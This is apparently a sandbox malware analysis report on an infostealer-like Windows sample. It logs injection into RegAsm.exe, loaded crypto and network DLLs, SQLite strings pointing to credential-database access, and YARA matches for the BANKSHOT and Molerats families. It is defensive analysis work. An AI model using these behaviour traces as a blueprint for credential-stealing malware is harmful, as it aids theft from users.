                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA34CF02_2_1FA34CF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA212A82_2_1FA212A8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA22AA92_2_1FA22AA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB89CC02_2_1FB89CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2292D2_2_1FA2292D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB49A202_2_1FB49A20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA220182_2_1FA22018
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAD59402_2_1FAD5940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA21C9E2_2_1FA21C9E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAC96902_2_1FAC9690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB894302_2_1FB89430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAB53B02_2_1FAB53B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA235802_2_1FA23580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FBFD2092_2_1FBFD209
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA390002_2_1FA39000
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB450402_2_1FB45040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA48D2A2_2_1FA48D2A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB24A602_2_1FB24A60
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA21EF12_2_1FA21EF1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA487632_2_1FA48763
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA847602_2_1FA84760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAB87602_2_1FAB8760
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA486802_2_1FA48680
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB604802_2_1FB60480
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA23AB22_2_1FA23AB2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAA81202_2_1FAA8120
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAA00902_2_1FAA0090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB480302_2_1FB48030
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2290A2_2_1FA2290A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA4BAB02_2_1FA4BAB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2251D2_2_1FA2251D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA533702_2_1FA53370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2174E2_2_1FA2174E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FBFAEBE2_2_1FBFAEBE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA82EE02_2_1FA82EE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA219DD2_2_1FA219DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2EA802_2_1FA2EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2AA402_2_1FA2AA40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB069C02_2_1FB069C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB3A9002_2_1FB3A900
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB1A9402_2_1FB1A940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2481D2_2_1FA2481D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA23E3B2_2_1FA23E3B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB5E8002_2_1FB5E800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA366C02_2_1FA366C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FB1A5902_2_1FB1A590
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA4A5602_2_1FA4A560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA247AF2_2_1FA247AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FAAA0B02_2_1FAAA0B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2209F2_2_1FA2209F
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: String function: 00C69B60 appears 53 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA21C2B appears 47 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FC006B1 appears 36 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA2415B appears 118 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 00404239 appears 287 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA2395E appears 78 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: String function: 1FA21F5A appears 31 times
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324
                Source: 56bDgH9sMQ.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 2.2.RegAsm.exe.42e038.1.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 00000002.00000002.3051781987.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: HiddenCobra_BANKSHOT_Gen date = 2017-12-26, hash5 = ef6f8b43caa25c5f9c7749e52c8ab61e8aec8053b9f073edeca4b35312a0a699, hash4 = daf5facbd67f949981f8388a6ca38828de2300cb702ad530e005430782802b75, hash3 = b766ee0f46c92a746f6db3773735ee245f36c1849de985bbc3a37b15f7187f24, hash2 = 8b2d084a8bb165b236d3e5436d6cb6fa1fda6431f99c4f34973dc735b4f2d247, hash1 = 89775a2fbb361d6507de6810d2ca71711d5103b113179f1e1411ccf75e6fc486, author = Florian Roth, description = Detects Hidden Cobra BANKSHOT trojan, hash9 = 6db37a52517653afe608fd84cc57a2d12c4598c36f521f503fd8413cbef9adca, hash8 = 3e6d575b327a1474f4767803f94799140e16a729e7d00f1bea40cd6174d8a8a6, hash7 = ec44ecd57401b3c78d849115f08ff046011b6eb933898203b7641942d4ee3af9, hash6 = d900ee8a499e288a11f1c75e151569b518864e14c58cc72c47f95309956b3eff, reference = https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: Process Memory Space: 56bDgH9sMQ.exe PID: 7736, type: MEMORYSTRMatched rule: Molerats_Jul17_Sample_5 date = 2017-07-07, hash1 = ebf2423b9de131eab1c61ac395cbcfc2ac3b15bd9c83b96ae0a48619a4a38d0a, author = Florian Roth, description = Detects Molerats sample - July 2017, reference = https://mymalwareparty.blogspot.de/2017/07/operation-desert-eagle.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/14@5/2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041246A CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle,2_2_0041246A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_004129BF CoInitializeEx,CoInitializeSecurity,CoCreateInstance,CoSetProxyBlanket,VariantInit,VariantClear,2_2_004129BF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\JFUY9M9X.htmJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7736
                Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\798e780e-3e0e-4fee-afc4-0c3b6c94dd7dJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
                Source: HDGDHC.2.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: RegAsm.exe, RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
                Source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.drBinary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
                Source: 56bDgH9sMQ.exeReversingLabs: Detection: 78%
                Source: 56bDgH9sMQ.exeVirustotal: Detection: 81%
                Source: unknownProcess created: C:\Users\user\Desktop\56bDgH9sMQ.exe "C:\Users\user\Desktop\56bDgH9sMQ.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7736 -s 324
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dbghelp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptnet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cabinet.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: 56bDgH9sMQ.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                Source: 56bDgH9sMQ.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3056036750.0000000019CC9000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3059615560.000000001FC38000.00000002.00001000.00020000.00000000.sdmp, sqlt[1].dll.2.dr
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041B050 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_0041B050
                Source: sqlt[1].dll.2.drStatic PE information: section name: .00cfg
                Source: C:\Users\user\Desktop\56bDgH9sMQ.exeCode function: 0_2_00C69536 push ecx; ret 0_2_00C69549
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00421EF5 push ecx; ret 2_2_00421F08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2D3AF push ebx; ret 2_2_1FA2D3B1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB97 push ebx; ret 2_2_1FA2CB98
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB9E push ebx; ret 2_2_1FA2CB9F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA21BF9 push ecx; ret 2_2_1FBC4C03
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB6B push ebx; ret 2_2_1FA2CB6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB7F push ebx; ret 2_2_1FA2CB82
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA2CB53 push ebx; ret 2_2_1FA2CB64
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA210C8 push ecx; ret 2_2_1FC23552
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA5322D push esp; ret 2_2_1FA5322E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA531AF push esp; ret 2_2_1FA531B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_1FA53187 push ebp; ret 2_2_1FA53188
